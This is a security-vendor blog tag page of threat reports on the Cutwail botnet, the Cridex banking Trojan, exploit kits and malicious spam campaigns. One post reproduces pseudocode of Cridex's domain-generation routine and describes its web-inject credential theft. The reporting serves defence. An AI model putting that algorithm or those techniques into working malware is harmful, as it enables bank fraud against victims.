Cutwail « M86 Security Labs Blog

Posts Tagged ‘Cutwail’

The Cridex Trojan Targets 137 Financial Organizations in One Go

By Daniel Chechik • March 1st, 2012 • Botnets Cybercrime Malware Spam

A few weeks ago M86 Security Labs alerted that cybercriminals managed to compromise hundreds of WordPress-based sites. These attacks started with several large spam campaigns as reported in our most recent blog post on Cutwail. These emails included embedded URL links or HTML attachments that tricked the user to browse to the compromised Web sites. All these links eventually lead to Web pages infected with the Phoenix exploit kit. These cybercriminals operate Fast flux networks, which are a DNS technique used by botnets to hide the main C&C servers.

After the target machine is successfully exploited, the Phoenix exploit kit downloads a Trojan to the victim’s machine. The downloaded Trojan is recognized by antivirus vendors under several names such as Cridex, Carberp and Dapato. Antivirus detection is quite low and only ten out of 43 antivirus scanners in VirusTotal can detect it.

VirusTotal scan of Cridex

Let’s take a look how this Trojan operates step by step.

Once the Cridex Trojan is loaded to the victims’ machine it executes several actions. First, it copies itself to drive C: as KB00447841.exe and creates the following files:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT
C:\Documents and Settings\Administrator\Application Data\KB00447841.exe

The BAT file upon its execution removes the original malware downloaded by the Phoenix exploit kit.

In the second phase, the malware hooks into the “explorer.exe” process. Then it communicates with its C&C which is done over Fast flux networks to make it harder to identify and shut down their C&C servers. Every several hours one domain becomes unavailable and is replaced by another one. In some cases, the traffic flow of the Trojan can look like this:

Fiddler dump of the Trojan’s traffic activity

Cridex consistently tries to find a live proxy to reach the C&C server. At first glance the domain names look random. However, when taking a closer look, we see that the Trojan generates a new domain name before every attempt to access the C&C:

Ollydbg - Debugging of "Explorer.exe" infected by the Trojan

Here is a pseudo code of the Trojan’s code:

ECX = ECX * 0x19660D
ECX = ECX + 0x3C6EF35F
ECX = ECX << 0×10
ECX = ECX – 0x7FFF
EAX = ECX
EDX = 0
EAX = EAX XOR 0×88
EBP = 0x1A
EAX = EAX / 0x1A
EDX = EAX % 0x1A
ESI++
EDX = EDX + 0×61
Address[EBX + ESI] = DX
If not reached the end of the domain name length continue

Using this logical algorithm to generate and access domains, the cybercriminals can resume the attack even after their server(s) are offline for some period of time.

Once the Trojan finds a live proxy, it connects to the C&C server and downloads a customized configuration from the Cridex botnet. The cybercriminals are currently running multiple botnets with over 25,000 infected machines.

Cridex botnet control panel

This Trojan’s capability is basically similar to Zeus and SpyEye. It collects information from the user’s machine and sends it to the C&C server. This information can include, for example, cookies, FTP credentials and email accounts.

The configuration panel of the Cridex Trojan

The cybercriminals can track specific Web sites that are accessed by the user by taking screenshots of every page the user accessed in real time. They can also blacklist URLs, redirect URLs and more. Same as with the Zeus Trojan, the administrators can supply a code to be injected into Web pages. The Cridex Trojan intercepts browser requests and changes the displayed content according to the configuration, written by the administrator of the botnet. This way the cybercriminal can trick the user to enter valuable information the cybercriminal is looking for, without raising suspicion.

What’s new in the Cridex Trojan compared to Zeus or SpyEye?

Cridex has a “WORLD BANKER CENTER” plug-in which includes a database of 137 banks. Yes, one hundred, thirty seven different banks or financial organizations from all over the world!

Data collected by the "WORLD BANK CENTER" plug-in

This control panel provides simple user experience for the cybercriminals. It contains the structure of the banking organization’s Web site pages, so the Trojan can identify which valuable fields to send back to the C&C. Moreover, the cybercriminals can create and change forms that are normally completed by the victim.

Templates of "WORLD BANK CENTER" plug-in

In conclusion, the Cridex Trojan takes control of the victim’s machines and allows it to collect information and potentially make fraudulent transactions by manipulating the bank Web pages.

M86 MailMarshal Secure Email Gateway customers are protected against these blended threat spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix exploit kit and in particular against the Cridex Trojan.

Cutwail Drives Spike in Malicious HTML Attachment Spam

By Rodel Mendrez • February 16th, 2012 • Spam

Over the past month, we have observed several large spam campaigns with malicious HTML attachments. We believe the botnet behind these campaigns is Cutwail. Here is data we collected, starting from the first day of 2012, illustrating spikes of spam with malicious HTML attachments:

Attaching an HTML file to an email is a tactic we have seen used in phishing. But recently, attackers have spammed out large volumes of HTML attachments that include malicious JavaScript. Here is an example we received a few days ago:

In the image above, we opened message with the attached .HTM file using the Mozilla Thunderbird email client. Although Thunderbird rendered the HTML attachment, fortunately its default settings prevented the malicious JavaScript in the HTML source code from running. The Thunderbird user needs to click the attachment or open the HTML file in a browser for the JavaScript to run.

The image below is another example of a more recent spam campaign. This particular message claims to be an invoice from a random company where an .HTM file is attached pretending to be an invoice file. Here, the sample spam was opened using Microsoft Outlook and the attachment just shows the icon of the default browser of the system. Again, in order for the malicious JavaScript to execute, the user needs to click the attachment to fire up a browser.

So what happens if the unsuspecting user opens the HTML attachment? Here is the HTML source code:

The first half of the HTML code is the benign part. It provides the “You are redirecting…” text in the browser title bar and prints “Please wait… Loading….” in the browser – the cybercriminal perhaps just being courteous. The second and malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a webpage in the same browser window. But this is not an ordinary webpage; it contains code that attempts to exploit multiple vulnerabilities in the browser and its plugin. In our test machine, the landing page successfully exploited our browser’s default PDF reader with the Libtiff integer overflow in Adobe Reader vulnerability. The exploit ended up downloading and installing malware in our test computer, which at the time of writing, was a data-stealing Trojan with the antivirus detection name Cridex.

The landing page that contains the exploit code is a kit used by cybercriminals particularly for this spam campaign, the Phoenix Exploit kit. This exploit kit is readily available for cybercriminals to buy and use, all they need is their own webserver that can run PHP server scripts. The image shown below is the screenshot of the actual server’s “Phoenix Exploit’s Kit” admin page. The “—“ referrer in the statistics suggests that most visitors were NOT coming from another website but from the HTML files that the cybercriminals spammed out. It also shows over 4000 visitors, 15% of whom were successfully exploited.

Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future.

M86 MailMarshal customers are protected against these spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix Exploit kit.

Thanks to Daniel Chechik for the additional analysis and insight on the Phoenix kit.

Tags: Cutwail | Exploit Kits | Malicious Spam | Malware

Want to be friends on Facebook? Don’t click the link!

By Phil Hay • August 29th, 2011 • Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues it is fake. The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom.

By contrast, here is a legitimate Facebook friend request.

Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilites on your system, notably Java.

The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.

Massive Rise in Malicious Spam

By Rodel Mendrez • August 16th, 2011 • Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.

Last week malicious spam made up at least 13% of the total spam volume we received which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet are mostly recycled spam themes – Fedex, credit card, changelogs and invoices. The malware is attached within a compressed ZIP archive and is a Trojan that downloads additional malware including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign

Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox

The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.

Tags: Cutwail | Featured | Malware | Spam

Malicious Spam on the increase again

By Rodel Mendrez • April 29th, 2011 • Spam

Malware distribution via email is far from dead. While we had a distinctly quiet period from October 2010 to March 2011, our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising, although still not as high as the peaks we saw mid last year when the Bredolab and Cutwail botnets were in full swing.

Malicious spam on the increase again

Malicious Spam Campaign Preys on Japanese Disaster

By Phil Hay • March 17th, 2011 • Spam

There is a large-scale malicious spam campaign going on currently. The spam comes in a few different types, one of which imitates a Twitter notification. The subjects of the spam varies, but sadly, many focus on the recent events in Japan.

The links, which you can see in the image above, or if you look at the raw HTML, are distinctive:

http://lowercase_gibberish.(com|org|net)/base64string

The links lead to a page hosting obfuscated malicious JavaScript, which seek to exploit a Java vulnerability. Our host was immediately compromised, botted (added to a botnet), and some not-so-subtle fake anti-virus malware was installed complete with scary desktop warning:

The spam is originating from one of the Cutwail spambot variants. We managed to get this template from Cutwail command and control traffic, which clearly shows the Twitter template being used.

We are still investigating the nature of the malicious landing page and subsequent infection.

With the rise in social networking, we have been seeing increased use of fake ‘notifications’ being used by spammers. As ever, remain on guard, especially when it comes to Twitter ‘notifications’.

Tags: Current Events | Cutwail | Japan | Malicious Spam | Twitter

UPS Spam.. Oh Wait, It’s an FDIC Spam Campaign

By Rodel Mendrez • February 15th, 2011 • Spam

After more than a week of malicious UPS spam campaigns, the Cutwail botnet changed its spamming theme this week. The malicious spam pretends to be from the Federal Deposit Insurance Corporation or FDIC claiming to notify users of important changes in FDIC regulations, hence a “document” is attached for further reading. However, the spammer did not manage to configure the spam template correctly and left the from field still using the domain ups.com.

And even worse, yesterday it left the Subject line as “United Parcel Service notification #<6 digits>“. Fail!

FDIC spam campaign with Subject line and From field pertaining to UPS.

The ZIP attachment contains malware which aims to steal online banking credentials, the same payload as the last week’s UPS spam campaign.

Decompressing the ZIP file exposes an executable Trojan file bearing an Adobe PDF icon

This spam campaign contains enough weird errors for users to take notice that the email is indeed suspicious. It may not last however, we expect this spammer will fix or come up with new (and recycled) spam campaigns as they try to distribute their malware.

Tags: Cutwail | FDIC | Malicious Spam | UPS

Cutwail’s Spam Cocktail

By Rodel Mendrez • September 21st, 2010 • Spam

Since June of this year when we first saw a FIFA World Cup 2010 spam campaign, we have regularly observed spam campaigns where an HTML attachment contains obfuscated JavaScript redirect code.

The Pushdo botnet’s spamming component, Cutwail, has been the culprit behind these types of malicious campaigns. Many different themes and subject lines have been used, such as the following:

America’s Got Talent

Apartment for rent

Shipping Notifications

Labels and such

Invoice for Floor Replacement

Delivery Status Notification (Failure)

Welcome Letter

NFL Picks Week 2

and other random subjects including this one that uses celebrity names:

Figure 1. Cutwail spam campaign sample

The attached HTML source code is an obfuscated JavaScript, and the snippet of code below is just one of the many variations:

Figure 2. Obfuscated JavaScript code

Tags: Cutwail | Fake AV | Javascript | Malicious Spam | Pushdo

Pushdo Botnet Crippled – II

By Phil Hay • September 9th, 2010 • Botnets

Two weeks ago we reported on the sudden drop in spam from the Pushdo botnet as a result of many of its control servers being taken down. Since then, spam output from this botnet has remained subdued, as the following updated chart shows.

As Pushdo (otherwise known by its spamming component Cutwail) was only responsible for about 10% of spam prior to the takedown, overall spam volumes have not been hugely affected. It is not uncommon to see 10% volume swings in a day. Having said that, last week our spam volume index did show slightly reduced overall levels of spam for the week.

Things seem to be warming up, however. Other researchers have observed more Cutwail control servers being added. Also, yesterday we saw a resumption of malicious spam from Pushdo with the Sasfis downloader as the payload. This simply reaffirms our earlier suspicions that these guys will not be down for long.

Tags: Cutwail | Malicious Spam | Pushdo | Sasfis | takedowns

Pushdo Botnet Crippled

By Phil Hay • August 27th, 2010 • Botnets

This morning we noticed that the usual torrent of spam from the Pushdo (or Cutwail) botnet had turned into a dribble. The chart below shows an index of Pushdo spam volume over the month of August.

Pushdo Stats

So what’s the reason for this sudden decline? It turns out that the folks at TLLOD have been busy analyzing Pushdo command and control servers, and coordinating their take down. According to their blog, over 30 Pushdo control servers were identified and 20 were taken down with the help of the relevant hosting providers. However, there still remains a few active control servers still serving up spamming data.

As the chart above shows, this coordinated takedown has had an immediate impact on Pushdo’s spam output. This is welcome news indeed, especially as Pushdo has been responsible for wave after wave of malicious spam campaigns in recent months. Still, we must sound a note of caution. Previous experience has taught us that these botnet take downs are short lived. Disabling control servers does not incapacitate the people behind the botnet. It is highly likely they’ll be back before long with new control servers, and bots to do their spamming. In the meantime, we can enjoy a few days with less spam about.

Tags: Cutwail | Malicious Spam | Spambot | takedowns